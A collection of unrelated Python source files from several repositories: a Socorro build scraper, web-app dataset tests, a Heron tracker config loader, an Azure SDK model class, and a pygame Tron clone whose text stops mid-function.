        dir_prefix = date.strftime('%Y-%m-%d')
        nightlies = getLinks(nightly_url, startswith=dir_prefix)
        for nightly in nightlies:
            for info in getNightly(nightly, nightly_url):
                platform, repository, version, kvpairs, bad_lines = info
                for bad_line in bad_lines:
                    self.config.logger.warning(
                        "Bad line for %s (%r)",
                        nightly, bad_line
                    )
                build_type = 'Nightly'
                if version.endswith('a2'):
                    # "a2" suffix marks the aurora channel
                    build_type = 'Aurora'
                if kvpairs.get('buildID'):
                    build_id = kvpairs['buildID']
                    self._insert_build(
                        cursor,
                        product_name,
                        version,
                        platform,
                        build_id,
                        build_type,
                        kvpairs.get('beta_number', None),
                        repository,
                        ignore_duplicates=True
                    )

    def scrapeB2G(self, connection, product_name, date):
        """Scrape B2G manifest files for *date* and insert the builds."""
        if not product_name == 'b2g':
            return
        cursor = connection.cursor()
        b2g_manifests = urljoin(
            self.config.base_url,
            product_name,
            'manifests',
            'nightly'
        )
        dir_prefix = date.strftime('%Y-%m-%d')
        version_dirs = getLinks(b2g_manifests, startswith='1.')
        for version_dir in version_dirs:
            prod_url = urljoin(
                b2g_manifests,
                version_dir,
                date.strftime('%Y'),
                date.strftime('%m')
            )
            nightlies = getLinks(prod_url, startswith=dir_prefix)
            for nightly in nightlies:
                b2gs = getB2G(
                    nightly,
                    prod_url,
                    backfill_date=None,
                    logger=self.config.logger
                )
                for info in b2gs:
                    (platform, repository, version, kvpairs) = info
                    build_id = kvpairs['buildid']
                    build_type = kvpairs['build_type']
                    self._insert_build(
                        cursor,
                        product_name,
                        version,
                        platform,
                        build_id,
                        build_type,
                        kvpairs.get('beta_number', None),
                        repository,
                        ignore_duplicates=True
                    )
import datetime
import sys
from socorro.app.generic_app import main
class _MockConnection(object):  # pragma: no cover
    """When running the FTPScraperCronAppRunner app, it never actually
    needs a database connection because instead of doing an insert
    it just prints. However, it primes the connection by getting a cursor
    out first (otherwise it'd have to do it every time in a loop).
    """
    def cursor(self):
        # deliberate no-op stand-in for a real DB cursor
        pass
class FTPScraperCronAppRunner(FTPScraperCronApp):  # pragma: no cover
    """Command-line runner that executes the scraper in dry-run mode,
    printing builds instead of inserting them."""

    required_config = Namespace()
    required_config.add_option(
        'date',
        # NOTE(review): evaluated once at import time, so a long-lived
        # process keeps a stale default; pass --date explicitly.
        default=datetime.datetime.utcnow(),
        doc='Date to run for',
        from_string_converter='socorro.lib.datetimeutil.string_to_datetime'
    )

    def __init__(self, config):
        # deliberately skips BaseCronApp.__init__: this runner only needs
        # the config, and it forces dry_run so nothing is written
        self.config = config
        self.config.dry_run = True

    def main(self):
        """Entry point invoked by generic_app.main()."""
        assert self.config.dry_run
        # bugfix: FTPScraperCronApp.run() takes only the date argument;
        # also passing a connection raised TypeError. run() obtains its
        # connections via database_transaction_executor itself.
        self.run(self.config.date)
# Allow running the scraper stand-alone (always dry-run via the runner).
if __name__ == '__main__':  # pragma: no cover
    sys.exit(main(FTPScraperCronAppRunner))
|
Fireblend/chromium-crosswalk | refs/heads/master | build/android/pylib/results/__init__.py | 1201 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
|
winnerineast/Origae-6 | refs/heads/master | origae/dataset/generic/test_views.py | 1 | # Copyright (c) 2016-2017, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
import json
import os
import tempfile
import unittest
from bs4 import BeautifulSoup
import numpy as np
import PIL.Image
import origae.test_views
from origae import extensions
from origae import test_utils
from origae.utils import constants
# May be too short on a slow system
TIMEOUT_DATASET = 45
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(origae.test_views.BaseViewsTest):
    """
    Provides some functions
    """
    @classmethod
    def dataset_exists(cls, job_id):
        """Return whether a dataset job with *job_id* exists."""
        return cls.job_exists(job_id, 'datasets')

    @classmethod
    def dataset_status(cls, job_id):
        """Return the status of the dataset job."""
        return cls.job_status(job_id, 'datasets')

    @classmethod
    def abort_dataset(cls, job_id):
        """Abort the dataset job; returns the HTTP status code."""
        return cls.abort_job(job_id, job_type='datasets')

    @classmethod
    def dataset_wait_completion(cls, job_id, **kwargs):
        """Wait for the dataset job to finish, defaulting the timeout."""
        kwargs['job_type'] = 'datasets'
        if 'timeout' not in kwargs:
            kwargs['timeout'] = TIMEOUT_DATASET
        return cls.job_wait_completion(job_id, **kwargs)

    @classmethod
    def delete_dataset(cls, job_id):
        """Delete the dataset job; returns the HTTP status code."""
        return cls.delete_job(job_id, job_type='datasets')
class BaseViewsTestWithDataset(BaseViewsTest):
    """
    Provides some functions
    """
    IMAGE_WIDTH = 32
    IMAGE_HEIGHT = 32
    CHANNELS = 1

    @classmethod
    def create_dataset(cls, **kwargs):
        """
        Create a dataset
        Returns the job_id
        Raises RuntimeError if job fails to create

        Keyword arguments:
        **kwargs -- data to be sent with POST request
        """
        data = {
            'dataset_name': 'test_dataset',
            'group_name': 'test_group',
        }
        data.update(kwargs)
        request_json = data.pop('json', False)
        url = '/datasets/generic/create/%s' % cls.EXTENSION_ID
        if request_json:
            url += '.json'
        rv = cls.app.post(url, data=data)
        if request_json:
            if rv.status_code != 200:
                raise RuntimeError(
                    'Dataset creation failed with %s' % rv.status_code)
            return json.loads(rv.data)['id']
        # expect a redirect
        if not 300 <= rv.status_code <= 310:
            # dump the error banner (or the full page) to help debugging
            s = BeautifulSoup(rv.data, 'html.parser')
            div = s.select('div.alert-danger')
            if div:
                print div[0]
            else:
                print rv.data
            raise RuntimeError(
                'Failed to create dataset - status %s' % rv.status_code)
        job_id = cls.job_id_from_response(rv)
        assert cls.dataset_exists(job_id), 'dataset not found after successful creation'
        cls.created_datasets.append(job_id)
        return job_id

    @classmethod
    def get_dataset_json(cls):
        """Fetch and return the dataset's JSON descriptor."""
        rv = cls.app.get('/datasets/%s.json' % cls.dataset_id)
        assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
        return json.loads(rv.data)

    @classmethod
    def get_entry_count(cls, stage):
        """Return the entry count of the create-DB task for *stage*,
        or None if no task matches."""
        json_data = cls.get_dataset_json()
        for t in json_data['create_db_tasks']:
            if t['stage'] == stage:
                return t['entry_count']
        return None

    @classmethod
    def get_feature_dims(cls):
        """Return the dataset's feature dimensions."""
        json_data = cls.get_dataset_json()
        return json_data['feature_dims']

    @classmethod
    def create_random_imageset(cls, **kwargs):
        """
        Create a folder of random grayscale images
        """
        num_images = kwargs.pop('num_images', 10)
        image_width = kwargs.pop('image_width', 32)
        image_height = kwargs.pop('image_height', 32)
        if not hasattr(cls, 'imageset_folder'):
            # create a temporary folder
            cls.imageset_folder = tempfile.mkdtemp()
        for i in xrange(num_images):
            x = np.random.randint(
                low=0,
                high=256,
                size=(image_height, image_width))
            x = x.astype('uint8')
            pil_img = PIL.Image.fromarray(x)
            filename = os.path.join(
                cls.imageset_folder,
                '%d.png' % i)
            pil_img.save(filename)
            # remember one image for tests that need a sample file
            if not hasattr(cls, 'test_image'):
                cls.test_image = filename

    @classmethod
    def create_variable_size_random_imageset(cls, **kwargs):
        """
        Create a folder of random grayscale images
        Image size varies randomly
        """
        num_images = kwargs.pop('num_images', 10)
        if not hasattr(cls, 'imageset_folder'):
            # create a temporary folder
            cls.imageset_folder = tempfile.mkdtemp()
        for i in xrange(num_images):
            image_width = np.random.randint(low=8, high=32)
            image_height = np.random.randint(low=8, high=32)
            x = np.random.randint(
                low=0,
                high=256,
                size=(image_height, image_width))
            x = x.astype('uint8')
            pil_img = PIL.Image.fromarray(x)
            filename = os.path.join(
                cls.imageset_folder,
                '%d.png' % i)
            pil_img.save(filename)
            if not hasattr(cls, 'test_image'):
                cls.test_image = filename

    @classmethod
    def setUpClass(cls, **kwargs):
        """Create the dataset once for the whole test class."""
        if extensions.data.get_extension(cls.EXTENSION_ID) is None:
            raise unittest.SkipTest('Extension "%s" is not installed' % cls.EXTENSION_ID)
        super(BaseViewsTestWithDataset, cls).setUpClass()
        cls.dataset_id = cls.create_dataset(json=True, **kwargs)
        assert cls.dataset_wait_completion(cls.dataset_id) == 'Done', 'create failed'
        # Save val DB path
        # NOTE(review): the local name 'json' shadows the json module
        # for the rest of this method
        json = cls.get_dataset_json()
        for t in json['create_db_tasks']:
            if t['stage'] == constants.VAL_DB:
                if t['feature_db_path'] is not None:
                    cls.val_db_path = os.path.join(
                        json['directory'],
                        t['feature_db_path'])
                else:
                    cls.val_db_path = None
class GenericViewsTest(BaseViewsTest):
    # Tests that only need the extension installed, not a created dataset.
    @classmethod
    def setUpClass(cls, **kwargs):
        if extensions.data.get_extension(cls.EXTENSION_ID) is None:
            raise unittest.SkipTest('Extension "%s" is not installed' % cls.EXTENSION_ID)
        super(GenericViewsTest, cls).setUpClass()

    def test_page_dataset_new(self):
        """The 'new dataset' page loads and shows the extension title."""
        rv = self.app.get('/datasets/generic/new/%s' % self.EXTENSION_ID)
        print rv.data
        assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
        assert extensions.data.get_extension(self.EXTENSION_ID).get_title() in rv.data, 'unexpected page format'

    def test_nonexistent_dataset(self):
        """A bogus job id must not be reported as an existing dataset."""
        assert not self.dataset_exists('foo'), "dataset shouldn't exist"
class GenericCreationTest(BaseViewsTestWithDataset):
    """
    Dataset creation tests
    """
    def test_create_json(self):
        """Creating via the JSON API succeeds (job then aborted)."""
        job_id = self.create_dataset(json=True)
        self.abort_dataset(job_id)

    def test_create_delete(self):
        job_id = self.create_dataset()
        assert self.delete_dataset(job_id) == 200, 'delete failed'
        assert not self.dataset_exists(job_id), 'dataset exists after delete'

    def test_create_abort_delete(self):
        job_id = self.create_dataset()
        assert self.abort_dataset(job_id) == 200, 'abort failed'
        assert self.delete_dataset(job_id) == 200, 'delete failed'
        assert not self.dataset_exists(job_id), 'dataset exists after delete'

    def test_create_wait_delete(self):
        job_id = self.create_dataset()
        assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
        assert self.delete_dataset(job_id) == 200, 'delete failed'
        assert not self.dataset_exists(job_id), 'dataset exists after delete'

    def test_invalid_number_of_reader_threads(self):
        """Zero reader threads must be rejected at creation time."""
        try:
            self.create_dataset(
                json=True,
                dsopts_num_threads=0)
            assert False
        except RuntimeError:
            # job is expected to fail with a RuntimeError
            pass

    def test_no_force_same_shape(self):
        job_id = self.create_dataset(force_same_shape=0)
        assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'

    def test_clone(self):
        """Cloning a dataset yields identical content and form data."""
        options_1 = {
            'resize_channels': '1',
        }
        job1_id = self.create_dataset(**options_1)
        assert self.dataset_wait_completion(job1_id) == 'Done', 'first job failed'
        rv = self.app.get('/datasets/%s.json' % job1_id)
        assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
        content1 = json.loads(rv.data)

        # Clone job1 as job2
        options_2 = {
            'clone': job1_id,
        }
        job2_id = self.create_dataset(**options_2)
        assert self.dataset_wait_completion(job2_id) == 'Done', 'second job failed'
        rv = self.app.get('/datasets/%s.json' % job2_id)
        assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
        content2 = json.loads(rv.data)

        # These will be different
        content1.pop('id')
        content2.pop('id')
        content1.pop('directory')
        content2.pop('directory')
        assert (content1 == content2), 'job content does not match'

        job1 = origae.webapp.scheduler.get_job(job1_id)
        job2 = origae.webapp.scheduler.get_job(job2_id)
        assert (job1.form_data == job2.form_data), 'form content does not match'
class GenericCreatedTest(BaseViewsTestWithDataset):
    """
    Tests on a dataset that has already been created
    """
    def test_index_json(self):
        """The created dataset shows up in the index listing."""
        rv = self.app.get('/index.json')
        assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
        content = json.loads(rv.data)
        found = False
        for d in content['datasets']:
            if d['id'] == self.dataset_id:
                found = True
                break
        assert found, 'dataset not found in list'

    def test_dataset_json(self):
        content = self.get_dataset_json()
        assert content['id'] == self.dataset_id, 'expected same job_id: %s != %s' % (content['id'], self.dataset_id)

    def test_edit_name(self):
        """Renaming the job is reflected on the summary page."""
        status = self.edit_job(
            self.dataset_id,
            name='new name'
        )
        assert status == 200, 'failed with %s' % status
        rv = self.app.get('/datasets/summary?job_id=%s' % self.dataset_id)
        assert rv.status_code == 200
        assert 'new name' in rv.data

    def test_edit_notes(self):
        status = self.edit_job(
            self.dataset_id,
            notes='new notes'
        )
        assert status == 200, 'failed with %s' % status

    def test_explore_features(self):
        # features DB is encoded by default
        rv = self.app.get('/datasets/generic/explore?db=train_db%%2Ffeatures&job_id=%s' % self.dataset_id)
        # just make sure this doesn't return an error
        assert rv.status_code == 200, 'page load failed with %s' % rv.status_code

    def test_feature_dims(self):
        dims = self.get_feature_dims()
        assert dims == [self.IMAGE_HEIGHT, self.IMAGE_WIDTH, self.CHANNELS]
################################################################################
# Test classes
################################################################################
class TestImageGradientViews(GenericViewsTest, test_utils.DatasetMixin):
    """
    Tests which don't require an imageset or a dataset
    """
    # extension under test
    EXTENSION_ID = "image-gradients"
class TestImageGradientCreation(GenericCreationTest, test_utils.DatasetMixin):
    """
    Test that create datasets
    """
    EXTENSION_ID = "image-gradients"

    @classmethod
    def setUpClass(cls, **kwargs):
        # create a gradients dataset with fixed train/val/test splits
        super(TestImageGradientCreation, cls).setUpClass(
            train_image_count=100,
            val_image_count=20,
            test_image_count=10,
            image_width=cls.IMAGE_WIDTH,
            image_height=cls.IMAGE_HEIGHT,
        )

    def test_entry_counts(self):
        """DB entry counts match the requested split sizes."""
        assert self.get_entry_count(constants.TRAIN_DB) == 100
        assert self.get_entry_count(constants.VAL_DB) == 20
        assert self.get_entry_count(constants.TEST_DB) == 10
class TestImageGradientCreated(GenericCreatedTest, test_utils.DatasetMixin):
    """
    Test that create datasets
    """
    EXTENSION_ID = "image-gradients"
    # non-square image to catch width/height mix-ups
    IMAGE_WIDTH = 8
    IMAGE_HEIGHT = 24

    @classmethod
    def setUpClass(cls, **kwargs):
        super(TestImageGradientCreated, cls).setUpClass(
            image_width=cls.IMAGE_WIDTH,
            image_height=cls.IMAGE_HEIGHT)
class TestImageProcessingCreated(GenericCreatedTest, test_utils.DatasetMixin):
    """
    Test Image processing extension
    """
    EXTENSION_ID = "image-processing"
    NUM_IMAGES = 100
    # percentage of images held out for validation
    FOLDER_PCT_VAL = 10

    @classmethod
    def setUpClass(cls, **kwargs):
        cls.create_random_imageset(
            num_images=cls.NUM_IMAGES,
            image_width=cls.IMAGE_WIDTH,
            image_height=cls.IMAGE_HEIGHT)
        super(TestImageProcessingCreated, cls).setUpClass(
            feature_folder=cls.imageset_folder,
            label_folder=cls.imageset_folder,
            folder_pct_val=cls.FOLDER_PCT_VAL,
            channel_conversion='L')

    def test_entry_counts(self):
        """Train/val counts reflect the percentage-based split."""
        assert self.get_entry_count(constants.TRAIN_DB) == self.NUM_IMAGES * (1. - self.FOLDER_PCT_VAL / 100.)
        assert self.get_entry_count(constants.VAL_DB) == self.NUM_IMAGES * (self.FOLDER_PCT_VAL / 100.)
class TestImageProcessingCreatedWithSeparateValidationDirs(GenericCreatedTest, test_utils.DatasetMixin):
    """
    Test Image processing extension, using separate fields for the train and
    validation folders.
    Use RGB channel conversion for this test.
    """

    EXTENSION_ID = "image-processing"
    NUM_IMAGES = 100
    CHANNELS = 3
    IMAGE_HEIGHT = 16
    IMAGE_WIDTH = 64

    @classmethod
    def setUpClass(cls, **kwargs):
        cls.create_random_imageset(
            num_images=cls.NUM_IMAGES,
            image_width=cls.IMAGE_WIDTH,
            image_height=cls.IMAGE_HEIGHT)
        # The same imageset is deliberately reused for both the train and
        # the explicit validation folders, so both DBs get all NUM_IMAGES.
        super(TestImageProcessingCreatedWithSeparateValidationDirs, cls).setUpClass(
            feature_folder=cls.imageset_folder,
            label_folder=cls.imageset_folder,
            has_val_folder='y',
            validation_feature_folder=cls.imageset_folder,
            validation_label_folder=cls.imageset_folder,
            channel_conversion='RGB')

    def test_entry_counts(self):
        assert self.get_entry_count(constants.TRAIN_DB) == self.NUM_IMAGES
        assert self.get_entry_count(constants.VAL_DB) == self.NUM_IMAGES
|
wangli1426/heron | refs/heads/master | heron/tools/tracker/src/python/config.py | 9 | # Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' config.py '''
import os
import yaml
from heron.statemgrs.src.python.config import Config as StateMgrConfig
STATEMGRS_KEY = "statemgrs"
VIZ_URL_FORMAT_KEY = "viz.url.format"
class Config(object):
    """
    Responsible for reading the yaml config file and
    exposing various tracker configs.
    """

    def __init__(self, conf_file):
        """Read, validate, and apply the tracker configuration file."""
        self.configs = None
        self.statemgr_config = StateMgrConfig()
        self.viz_url_format = None
        self.parse_config_file(conf_file)

    def parse_config_file(self, conf_file):
        """Parse the yaml config file into ``self.configs`` and apply it."""
        expanded_conf_file_path = os.path.expanduser(conf_file)
        assert os.path.lexists(expanded_conf_file_path), "Config file does not exist: %s" % (conf_file)

        # Read the configuration file.
        # NOTE(review): yaml.load without an explicit Loader can construct
        # arbitrary Python objects; if the config file is not fully trusted,
        # switch to yaml.safe_load.
        with open(expanded_conf_file_path, 'r') as f:
            self.configs = yaml.load(f)

        self.load_configs()

    def load_configs(self):
        """Push parsed values into the state manager and viz url settings."""
        self.statemgr_config.set_state_locations(self.configs[STATEMGRS_KEY])
        if VIZ_URL_FORMAT_KEY in self.configs:
            self.viz_url_format = self.validated_viz_url_format(self.configs[VIZ_URL_FORMAT_KEY])
        else:
            # No viz url configured; get_formatted_viz_url will return "".
            self.viz_url_format = ""

    # pylint: disable=no-self-use
    def validated_viz_url_format(self, viz_url_format):
        """Validate the visualization url format and return it unchanged.

        Raises an Exception if the format contains an unknown ``${...}``
        parameter (i.e. any ``$`` survives substitution of the known ones).
        """
        # We try to create a string by substituting all known
        # parameters. If an unknown parameter is present, an error
        # will be thrown
        valid_parameters = {
            "${CLUSTER}": "cluster",
            "${ENVIRON}": "environ",
            "${TOPOLOGY}": "topology",
            "${ROLE}": "role",
            "${USER}": "user",
        }
        dummy_formatted_viz_url = viz_url_format
        # items() (instead of the Python-2-only iteritems()) behaves the
        # same here and keeps the module importable on Python 3 as well.
        for key, value in valid_parameters.items():
            dummy_formatted_viz_url = dummy_formatted_viz_url.replace(key, value)

        # All $ signs must have been replaced
        if '$' in dummy_formatted_viz_url:
            raise Exception("Invalid viz.url.format: %s" % (viz_url_format))

        # No error is thrown, so the format is valid.
        return viz_url_format

    def get_formatted_viz_url(self, execution_state):
        """
        @param execution_state: The python dict representing JSON execution_state
        @return Formatted viz url
        """
        # Create the parameters based on execution state
        valid_parameters = {
            "${CLUSTER}": execution_state["cluster"],
            "${ENVIRON}": execution_state["environ"],
            "${TOPOLOGY}": execution_state["jobname"],
            "${ROLE}": execution_state["role"],
            "${USER}": execution_state["submission_user"],
        }
        formatted_viz_url = self.viz_url_format
        for key, value in valid_parameters.items():
            formatted_viz_url = formatted_viz_url.replace(key, value)
        return formatted_viz_url
|
AutorestCI/azure-sdk-for-python | refs/heads/master | azure-mgmt-advisor/azure/mgmt/advisor/models/config_data.py | 2 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ConfigData(Model):
    """The Advisor configuration data structure.

    :param id: The resource Id of the configuration resource.
    :type id: str
    :param type: The type of the configuration resource.
    :type type: str
    :param name: The name of the configuration resource.
    :type name: str
    :param properties: The list of property name/value pairs.
    :type properties: ~azure.mgmt.advisor.models.ConfigDataProperties
    """

    # NOTE: AutoRest-generated code (see file header) — manual edits are
    # lost on regeneration. Maps attribute name -> wire key and msrest type
    # for (de)serialization.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'properties': {'key': 'properties', 'type': 'ConfigDataProperties'},
    }

    def __init__(self, id=None, type=None, name=None, properties=None):
        super(ConfigData, self).__init__()
        self.id = id
        self.type = type
        self.name = name
        self.properties = properties
|
THEMVFFINMAN/PyttleShip | refs/heads/master | PYTRON/main.py | 2 | import copy
import math
import pygame
import random
import sys
pygame.init()
# Initializing some colors for cleaner looks throughout
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREEN = (0, 80, 0)
RED = (255, 0, 0)
LIGHTBLUE = (0, 255, 255)

# I've tried to program this in it's entirety based
# on these variables so that they can be changed
# and still work at any time, will do more testing on this later
# Grid cells are 15 px square: board_width / block_width == 960 / 64 == 15
# and board_height / block_height == 720 / 48 == 15.
game_width = 1024
game_height = 850
board_width = 960
board_height = 720
board_x = 32
board_y = 100
game_speed = 100
block_width = 64
block_height = 48
fill_limit = 750

# Starting positions/directions (dir: 0=up, 1=right, 2=down, 3=left).
#user_start_x = 40 * 15 + board_x
#user_start_y = 23 * 15 + board_y
#user_dir = 1
user_start_x = 56 * 15 + board_x
user_start_y = 24 * 15 + board_y
user_dir = 3
user_image = 'tron.png'
user_color = LIGHTBLUE
user_brick = 'brick.png'
enemy1_start_x = 7 * 15 + board_x
enemy1_start_y = 24 * 15 + board_y
enemy1_dir = 1
enemy1_image = 'cp.png'
enemy1_color = RED
enemy1_brick = 'brick2.png'

# Some more initialization stuff
font = pygame.font.Font(None, 36)
size = (game_width, game_height)
screen = pygame.display.set_mode(size)
pygame.display.set_caption("PYTRON")
clock = pygame.time.Clock()
# Custom timer event driving the game tick every game_speed milliseconds.
move = pygame.USEREVENT + 1
pygame.time.set_timer(move, game_speed)
def draw_board():
    """Draw the green grid lines that make up the playing board.

    Fix: the vertical lines' bottom x-coordinate was hard-coded as 31,
    which is board_x - 1 only for the current board_x == 32; using
    board_x - 1 keeps the lines vertical if the board is ever moved,
    matching the configurability the module header promises.
    """
    # Vertical grid lines, one per column boundary (15 px cells).
    for k in range(0, block_width + 1):
        pygame.draw.line(screen, GREEN, (board_x - 1 + (k * 15), board_y - 1),
                         (board_x - 1 + (k * 15), board_height + board_y - 1), 2)
    # Horizontal grid lines, one per row boundary.
    for k in range(0, block_height + 1):
        pygame.draw.line(screen, GREEN, (board_x - 1, board_y - 1 + (k * 15)),
                         (board_width + board_x - 1, board_y - 1 + (k * 15)), 2)
class Graph(object):
    """Adjacency map of the open board cells, used by the enemy AI.

    The graph is a dict where the key is a tuple of coordinates and the
    values are the active (non-wall) neighbor coordinates as tuples.
    ``future_graph`` is a deep-copied scratch graph used for look-ahead
    flood fills without disturbing the live graph.

    NOTE(review): instance methods here name their first parameter ``cls``,
    but they receive the instance — it behaves exactly like ``self``.
    """

    def __init__(self):
        self.graph_dict = {}
        self.future_graph = {}
        self.generate_new_graph()

    def generate_new_graph(cls):
        # This will generate the graph of coordinates: every cell gets edges
        # to its in-bounds 4-connected neighbors.
        graph_dict = {}
        for row in range(0, block_height):
            for column in range(0, block_width):
                graph_dict[(row, column)] = []
                if row + 1 < block_height:
                    graph_dict[(row, column)].append((row + 1, column))
                if row - 1 >= 0:
                    graph_dict[(row, column)].append((row - 1, column))
                if column + 1 < block_width:
                    graph_dict[(row, column)].append((row, column + 1))
                if column - 1 >= 0:
                    graph_dict[(row, column)].append((row, column - 1))
        cls.graph_dict = graph_dict

    def get_path_size(cls, x, y):
        """Return how many cells are reachable from (x, y) in future_graph.

        This is the floodfill at work; returns 0 if (x, y) is a wall.
        """
        if ((x, y)) in cls.future_graph:
            # If the coordinate is in the dict, as in if it isn't a driver wall
            # Then it runs, otherwise it returns 0
            path = set()
            checked = []
            path.add((x, y))
            checked.append((x, y))
            # Instead of recursion, I just continually add things to the
            # queue and then pop them as I go
            while checked:
                coord = checked.pop()
                for element in cls.future_graph[coord]:
                    # I use a set and check the set because checking if it's
                    # in a set is constant time. This also prevents me from
                    # adding the same coordinates infinite times
                    if element not in path:
                        path.add(element)
                        checked.append(element)
            return len(path)
        return 0

    def copy_graph(cls):
        # Snapshot the live graph so look-ahead edits don't corrupt it.
        cls.future_graph = copy.deepcopy(cls.graph_dict)

    def print_graph(cls):
        # Debug helper: dump future_graph then graph_dict as 0/1 matrices.
        # (Python 2 print statements.)
        arrayify = [[0 for x in range(0, block_width)] for y in range(0, block_height)]
        for i in range(0, block_width):
            for j in range(0, block_height):
                if (j, i) in cls.future_graph:
                    arrayify[j][i] = 1
        for row in arrayify:
            print row
        print
        arrayify = [[0 for x in range(0, block_width)] for y in range(0, block_height)]
        for i in range(0, block_width):
            for j in range(0, block_height):
                if (j, i) in cls.graph_dict:
                    arrayify[j][i] = 1
        for row in arrayify:
            print row

    def remove_node(cls, x, y):
        # First it checks all its neighbors (keys) and removes the edges to
        # itself (values), then it removes itself (key) from the graph.
        for coord in cls.graph_dict[(x, y)]:
            cls.graph_dict[coord].remove((x, y))
        cls.graph_dict.pop((x, y), None)

    def remove_future_node(cls, x, y):
        # Same as remove_node but on the look-ahead copy; returns the popped
        # adjacency list, or False when (x, y) was already a wall.
        if (x, y) in cls.future_graph:
            for coord in cls.future_graph[(x, y)]:
                cls.future_graph[coord].remove((x, y))
            return cls.future_graph.pop((x, y), None)
        else:
            return False

    def remove_next_moves(cls, apart, x, y):
        """Carve a virtual wall into future_graph around (x, y).

        Every cell reachable from (x, y) whose Manhattan distance from the
        start is below ``apart`` is removed, so the AI treats the opponent's
        possible next moves as already blocked.
        """
        current_x = x
        current_y = y
        path = set()
        checked = []
        path.add((x, y))
        checked.append((x, y))
        while checked:
            coord = checked.pop()
            if coord in cls.future_graph:
                if (abs(coord[0] - current_x) + abs(coord[1] - current_y)) < apart:
                    for element in cls.future_graph[coord]:
                        if element not in path:
                            path.add(element)
                            checked.append(element)
        while path:
            coord = path.pop()
            cls.remove_future_node(coord[0], coord[1])
class Overseer(object):
    """Holds match state that outlives a single round (scores, resets).

    TODO: scoring is declared here but not yet updated anywhere.
    """

    def __init__(self):
        # Both sides start a fresh match with zero points.
        self.user_score = 0
        self.cp_score = 0
class Brick(object):
    """One 15x15 trail segment, used for both user and CP bricks."""

    def __init__(self, x, y, outline_color, image):
        self.image = pygame.image.load(image).convert()
        self.outline_color = outline_color
        self.rect = self.image.get_rect()
        self.rect.left = x
        self.rect.top = y
        # Which sides already touch a neighboring brick. An outline is drawn
        # only on free sides, so adjacent bricks render as one fused tail.
        self.top = False
        self.right = False
        self.bottom = False
        self.left = False

    def update_draw(cls):
        # Determines if a line for an outline needs to be drawn and draws it
        # This section is what makes the driver's tail stick together
        screen.blit(cls.image, cls.rect)
        if cls.top is False:
            pygame.draw.line(screen, cls.outline_color, (cls.rect.left, cls.rect.top),
                             (cls.rect.left + 14, cls.rect.top), 1)
        if cls.right is False:
            pygame.draw.line(screen, cls.outline_color, (cls.rect.left + 14, cls.rect.top),
                             (cls.rect.left + 14, cls.rect.top + 14), 1)
        if cls.bottom is False:
            pygame.draw.line(screen, cls.outline_color, (cls.rect.left, cls.rect.top + 14),
                             (cls.rect.left + 14, cls.rect.top + 14), 1)
        if cls.left is False:
            pygame.draw.line(screen, cls.outline_color, (cls.rect.left, cls.rect.top),
                             (cls.rect.left, cls.rect.top + 14), 1)
class Driver(object):
    """A light-cycle, used for both the user and enemies.

    Direction encoding (see move()): 0=up, 1=right, 2=down, 3=left.
    NOTE(review): methods take ``cls`` as the first parameter but receive
    the instance; it behaves like ``self``.
    """

    def __init__(self, x, y, direction, image, color, brickimage):
        self.image = pygame.image.load(image).convert()
        self.rect = self.image.get_rect()
        self.rotated = False
        self.rect.left = x
        self.rect.top = y
        self.dir = direction
        self.color = color
        self.brickimage = brickimage
        # Trail of Brick objects laid behind this driver.
        self.driver_trail = []

    def update_draw(cls):
        screen.blit(cls.image, cls.rect)

    # These will rotate the image to face the correct way and change the
    # direction as well (rotation amount depends on the current heading).
    def up(cls):
        if cls.dir == 1:
            cls.image = pygame.transform.rotate(cls.image, 90)
        elif cls.dir == 3:
            cls.image = pygame.transform.rotate(cls.image, 270)
        cls.dir = 0

    def right(cls):
        if cls.dir == 0:
            cls.image = pygame.transform.rotate(cls.image, 270)
        elif cls.dir == 2:
            cls.image = pygame.transform.rotate(cls.image, 90)
        cls.dir = 1

    def down(cls):
        if cls.dir == 1:
            cls.image = pygame.transform.rotate(cls.image, 270)
        elif cls.dir == 3:
            cls.image = pygame.transform.rotate(cls.image, 90)
        cls.dir = 2

    def left(cls):
        if cls.dir == 0:
            cls.image = pygame.transform.rotate(cls.image, 90)
        elif cls.dir == 2:
            cls.image = pygame.transform.rotate(cls.image, 270)
        cls.dir = 3

    def move(cls):
        # Just moves the little rectangle around, one 15 px cell per tick.
        if cls.dir == 0:
            cls.rect.top = cls.rect.top - 15
        elif cls.dir == 1:
            cls.rect.left = cls.rect.left + 15
        elif cls.dir == 2:
            cls.rect.top = cls.rect.top + 15
        elif cls.dir == 3:
            cls.rect.left = cls.rect.left - 15

    def reset(cls, x, y, direction, image):
        # Resets the driver, used after crashes and the like.
        # Reloads the image so any accumulated rotation is discarded.
        cls.image = pygame.image.load(image).convert()
        cls.rect = cls.image.get_rect()
        cls.rotated = False
        cls.rect.left = x
        cls.rect.top = y
        cls.dir = direction
def getNewBoard(width=None, height=None):
    """Return a fresh playfield grid surrounded by a wall border.

    The grid is (height + 2) x (width + 2): 0 marks open space and 2 marks
    a boundary wall cell.

    @param width: number of playable columns; defaults to the module-level
        block_width (keeps the original zero-argument call working).
